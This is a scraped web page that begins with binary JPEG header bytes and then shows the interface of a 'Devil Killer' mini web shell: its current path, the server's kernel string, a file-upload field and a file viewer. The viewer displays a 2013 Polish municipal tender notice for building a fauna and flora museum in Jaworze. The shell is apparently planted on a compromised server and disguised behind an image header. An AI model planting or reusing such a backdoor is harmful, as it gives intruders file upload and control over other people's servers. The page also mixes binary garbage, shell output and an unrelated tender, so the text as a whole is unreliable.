JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130516/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130516/191122-N-2013.html

<p class="kh_header"><b>Jaworze: Budowa Muzeum fauny i flory morskiej i śródlądowej w Jaworzu</b><br>
<b>Numer ogłoszenia: 191122 - 2013; data zamieszczenia: 16.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Jaworze , ul. Zdrojowa 82, 43-384 Jaworze, woj. śląskie, tel. 33 828 66 00, faks 33 828 66 01.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.jaworze.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa Muzeum fauny i flory morskiej i śródlądowej w Jaworzu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> W ramach przedmiotu zamówienia należy wykonać roboty związane z budową:
1. budynku muzeum fauny i flory morskiej i śródlądowej niepodpiwniczonego, jednokondygnacyjnego o kubaturze obiektu 1559,05 m3 oraz powierzchni użytkowej 263,92 m2,
      -   przyłączenie do istniejącego przyłącza sieci energii elektrycznej,
      - przyłączenie do sieci wodociągowej z istniejącego rurociągu o średnicy 100 mm, zlokalizowanego 
          w ul. Wapienickiej,
      -  przyłączenie do istniejącej sieci kanalizacji sanitarnej,
      -  przyłączenie do istniejącej sieci gazowej  o średnicy 32 PE,
      -  wykonanie odprowadzenia wód opadowych do istniejącej kanalizacji deszczowej,
      -  wykonanie instalacji wewnętrznej wod.- kan., gazowej oraz c.o. dla obiektu,
      -  wykonanie instalacji elektrycznej  wewnętrznej dla obiektu,
2. parkingu dla samochodów osobowych wraz z drogą dojazdową i zjazdem z drogi powiatowej 
          - `ul. Wapienicka
3.     	Wykonawca zapewni oznakowanie promocyjne projektu na terenie budowy w trakcie robót zgodnie 
z obowiązującą Księgą wizualizacji znaku Programu Operacyjnego Zrównoważony rozwój sektora rybołówstwa i nadbrzeżnych obszarów rybackich 2007-2013 oraz wskazówkami Zamawiającego (wykonanie i montaż jednej tablicy informacyjnej).
4.   Wykonawca udzieli Zamawiającemu gwarancji na wykonane roboty na okres 36 miesięcy od dnia odebrania przez Zamawiającego robót budowlanych i podpisania (bez uwag) protokołu końcowego.
5.     Roboty geodezyjne oraz przygotowanie dokumentacji odbiorowej i powykonawczej.

W ramach przedmiotu zamówienia należy ponadto wykonać  roboty budowlane nie objęte dofinansowaniem 
w ramach ww. programu operacyjnego lecz finansowane wyłącznie z budżetu gminy :
1.   przebudowa sieci kanalizacji deszczowej w rejonie projektowanej inwestycji polegająca na wykonaniu 
          kanałów z rur typu PVC oraz studzienek rewizyjnych,
2.       przebudowa urządzeń nN,
3.      wyposażenie biurowe - Załącznik Nr 11 do SIWZ,
4.      zestaw multimedialny (komputer przenośny, podwieszany ekran rozsuwany, rzutnik).
UWAGA: 
W trakcie realizacji robót Zamawiający zastrzega sobie przeprowadzenie  konsultacje z Wykonawcą w zakresie wyboru między innymi kolorystyki ścian, oświetlenia pomieszczeń..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.23.13-3, 45.33.20.00-3, 45.33.12.00-8, 43.33.30.00-0, 45.33.00.00-9, 45.22.33.00-9, 45.23.32.20-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.05.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda od wykonawców wniesienia wadium w wysokości: 40 000,00 złotych, (słownie:czterdzieści tysięcy i 00/100 złotych).
Wadium może być wnoszone w jednej lub kilku następujących formach:
pieniądzu;
poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
gwarancjach bankowych;
gwarancjach ubezpieczeniowych;
poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 
9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. 
Nr 42, poz. 275 z późn. zmian.).
Termin i sposób wniesienia wadium.
Wadium wnoszone w formie pieniądza należy wnieść na rachunek bankowy Urzędu Gminy Jaworze - Bank Spółdzielczy w Jasienicy
Numer konta : 87 8117 00030012 0261 2000 0030 
Dokument potwierdzający wniesienie wadium w formie innej niż pieniądz należy złożyć 
w oryginale w Kasie Urzędu Gminy Jaworze, ul. Zdrojowa 82, 43-384 Jaworze, woj. śląskie,
Wadium wnosi się przed upływem terminu składania ofert. Wadium uznaje się za wniesione, jeżeli: 
wnoszone w formie pieniądza znalazło się na rachunku bankowym Zamawiającego przed upływem terminu na składanie ofert.
wnoszone w pozostałych formach oryginały dokumentów zostały złożone 
w Kasie Urzędu Gminy Jaworze, ul. Zdrojowa 82, 43-384 Jaworze, woj. śląskie.
Wymagania dotyczące wadium wnoszonego w formie innej niż pieniądz.
W treści wadium składanego w formie innej niż pieniądz muszą być wyszczególnione okoliczności w jakich Zamawiający zatrzymuje wadium wraz z odsetkami, określone: 
w art. 46 ust. 4a ustawy Pzp tj. jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 uPzp nie złożył dokumentów lub oświadczeń, o których mowa 
w art. 25 ust. 1 uPzp lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie,
w art. 46 ust. 5 uPzp, tj.: jeżeli wykonawca, którego oferta została wybrana: 
a)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie, 
b)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy, 
c)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe 
z przyczyn leżących po stronie wykonawcy. 
Wadium w formach wymienionych w art. 45 ust. 6 pkt. 2 - 5 uPzp musi być wystawione na Gminę Jaworze.
Z treści gwarancji (poręczenia) musi jednoznacznie wynikać, jaki jest sposób reprezentacji Gwaranta. 
Gwarancja musi być podpisana przez upoważnionego (upełnomocnionego) przedstawiciela Gwaranta. Podpis winien być sporządzony w sposób umożliwiający jego identyfikację, np. złożony wraz z imienną pieczątką lub czytelny (z podaniem imienia i nazwiska)
Z treści gwarancji winno wynikać bezwarunkowe zobowiązanie Gwaranta (poręczyciela) do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a 
i ust. 5 Prawa zamówień publicznych, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą. 
Wadium wniesione przez jednego z Wykonawców wspólnie ubiegających się o zamówienie uważa się za wniesione prawidłowo.
Wadium ulega zatrzymaniu zgodnie z art. 46 ust. 4a i 5 uPzp.
Wadium zwraca się w sytuacjach określonych w art. 46 ust. 1-2 i 4 uPzp.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W tym zakresie Zamawiający nie określa szczególnych wymagań.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W tym zakresie Zamawiający wymaga aby Wykonawca:
wykonał w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres 
prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedno zamówienie, wraz 
z podaniem jego rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów 
dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób 
należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej 
i prawidłowo ukończone, polegające na robotach budowlanych odpowiadających swoim rodzajem 
robotom będących przedmiotem zamówienia - obejmujących budowę o powierzchni nie mniejszej 
niż 250,00 m2. Wartość zamówienia nie może być mniejsza niż 600 000,00 zł brutto (sześćset
tysięcy złotych). Za najważniejsze roboty budowlany zostaną uznane roboty spełniające co najmniej parametry, o których mowa w zdaniu poprzedzającym.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W tym zakresie Zamawiający wymaga aby Wykonawca dysponował :
jedną osoba, która będzie pełnić obowiązki kierownika budowy, posiadająca uprawnienia 
                 do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez 
                 ograniczeń posiadającą doświadczenie w pełnieniu funkcji kierownika budowy oraz 
                 co najmniej 3 letnie doświadczenie zawodowe,
 jedną osobą, która będzie pełnić funkcję kierownika budowy, posiadającą uprawnienia do 
                 kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji 
                 i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez 
                 ograniczeń w zakresie objętym przedmiotem zamówienia oraz co najmniej 3 letnie  
                 doświadczenie zawodowe,
jedną osobą, która będzie pełnić funkcję kierownika robót, posiadającą uprawnienia do 
                  kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji 
                  i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń w zakresie objętym 
                  przedmiotem zamówienia oraz co najmniej 3 letnie doświadczenie zawodowe,
 jedną osobą, która będzie pełnić funkcję kierownika robót, posiadającą uprawnienia do 
                  kierowania robotami drogowymi bez ograniczeń w zakresie objętym przedmiotem 
                  zamówienia oraz co najmniej 3 letnie doświadczenie zawodowe.
                  UWAGA 1
                     Zamawiający określając wymogi dla każdej osoby w zakresie posiadanych uprawnień 
                     budowlanych, stosownie do wymogów określonych w ustawie z dnia 07 lipca 1994 r. Prawo 
                     budowlane (tekst jednolity Dz. U. z 2010 roku, Nr 243, poz.1623 z późn. zm.), rozporządzeniu 
                     Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji 
                     technicznych w budownictwie (Dz.U. z 2006 r. Nr 83, poz.578 z późn. zm.) lub odpowiadające im 
                     ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów, 
                     dopuszcza odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru 
                     Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów 
                     ustawy z dnia 07 lipca 1994 r. Prawo budowlane (tekst jedn. Dz. U. z 2010 r., Nr 243, poz. 1623 
                     z późn. zm.) oraz ustawy z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych 
                     nabytych w państwach członkowskich Unii Europejskiej (Dz. U. Nr 63, poz. 394).
       UWAGA 2 
                      Kierownik budowy oraz kierownik robót drogowych muszą posiadać biegłą znajomość języka 
                      polskiego, w przypadku gdy nie posiadają oni biegłej znajomości języka polskiego, Wykonawca 
                      zobowiązany jest zapewnić, na własny koszt, tłumacza dla potrzeb i na okres realizacji umowy.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W tym zakresie Zamawiający wymaga aby Wykonawca:
Posiadał środki finansowe lub zdolność kredytową nie mniejszą niż 800 000,00 złotych 
                                /słownie: osiemset tysięcy i 00/100 złotych/.
Posiadał opłaconą polisę ubezpieczeniową od odpowiedzialności cywilnej w zakresie 
              prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na sumę 
              nie mniejszą niż 300.000,00 złotych /słownie: trzysta tysięcy i 00/100 złotych.
                     W przypadku, gdy przedstawiona przez Wykonawcę informacja od podmiotu, w którym 
                     Wykonawca posiada rachunek, potwierdza wysokość posiadanych środków finansowych 
                     lub zdolność kredytową poprzez określenie jedynie liczby cyfr widniejących na koncie, 
                     zamiast jej pełnego ujawnienia, Zamawiający przy ocenie spełnienia przez Wykonawcę 
                     warunków udziału w postępowaniu uzna, iż Wykonawca przedstawił potwierdzenie dotyczące 
                     najniższej kwoty możliwej do zapisania przy użyciu ujawnionej liczby cyfr. 
      W wypadku podania kwot w walutach obcych, w dokumentach składanych przez podmioty 
      zagraniczne, Zamawiający dokona przeliczenia tych kwot na PLN - na podstawie średniego kursu 
      złotego w stosunku do walut obcych określonego w Tabeli Kursów A średnich walut obcych 
      Narodowego Banku Polskiego (http://www.nbp.pl) z dnia wystawienia dokumentu.  
Opis sposobu oceny spełniania warunków udziału w postępowaniu.
        Zamawiający dokona oceny spełniania przez Wykonawców warunków określonych na 
        podstawie dokumentów wymienionych w Rozdziale 6 SIWZ przedstawionych przez Wykonawcę wraz 
        z ofertą. Wykonawcy, którzy ubiegają się wspólnie o udzielenie zamówienia warunki w zakresie: wiedzy 
        i doświadczenia, dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do  
        wykonania zamówienia, sytuacji ekonomicznej i finansowej mogą spełniać łącznie.
Zgodnie z zapisami art. 26 ust. 2b Pzp, Wykonawca może  polegać  na wiedzy i doświadczeniu, potencjale  technicznym, osobach zdolnych do wykonania zamówienia  lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi  stosunków. Wykonawca w  takiej  sytuacji zobowiązany  jest udowodnić Zamawiającemu, iż będzie  dysponował  zasobami  niezbędnymi  do  realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie  tych podmiotów  do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia, zgodnie z postanowieniami § 1 ust. 6 pkt 2 rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz.U. z 2013, poz. 231) lub inne dokumenty potwierdzające wskazane w tym przepisie okoliczności.
Fakt spełnienia warunków wynikać powinien jednoznacznie z treści tychże dokumentów. Zamawiający dokona oceny spełniania przez Wykonawców warunków określonych według formuły 
spełnia - nie spełnia.

Jeżeli Wykonawca nie dołączy do oferty wymaganych oświadczeń i dokumentów lub z ich treści nie będzie wynikać, że zostały spełnione warunki udziału w postępowaniu - z zastrzeżeniem art. 26 ust. 3 Pzp, to Zamawiający wykluczy Wykonawcę na podstawie art. 24 ust. 2 pkt 4 Pzp.
Udział w postępowaniu o udzielenie zamówienia publicznego mogą brać Wykonawcy, którzy nie 
        podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego z powodów określonych 
        w art. 24 ust. 1 ustawy Pzp.
Opis sposobu oceny spełniania warunków udziału w postępowaniu. Zamawiający dokona oceny spełniania przez Wykonawców warunków określonych na podstawie dokumentów wymienionych w Rozdziale 6 SIWZ przedstawionych przez Wykonawcę wraz 
z ofertą. 
Zamawiający dokona oceny spełniania przez Wykonawców warunków określonych  według formuły spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
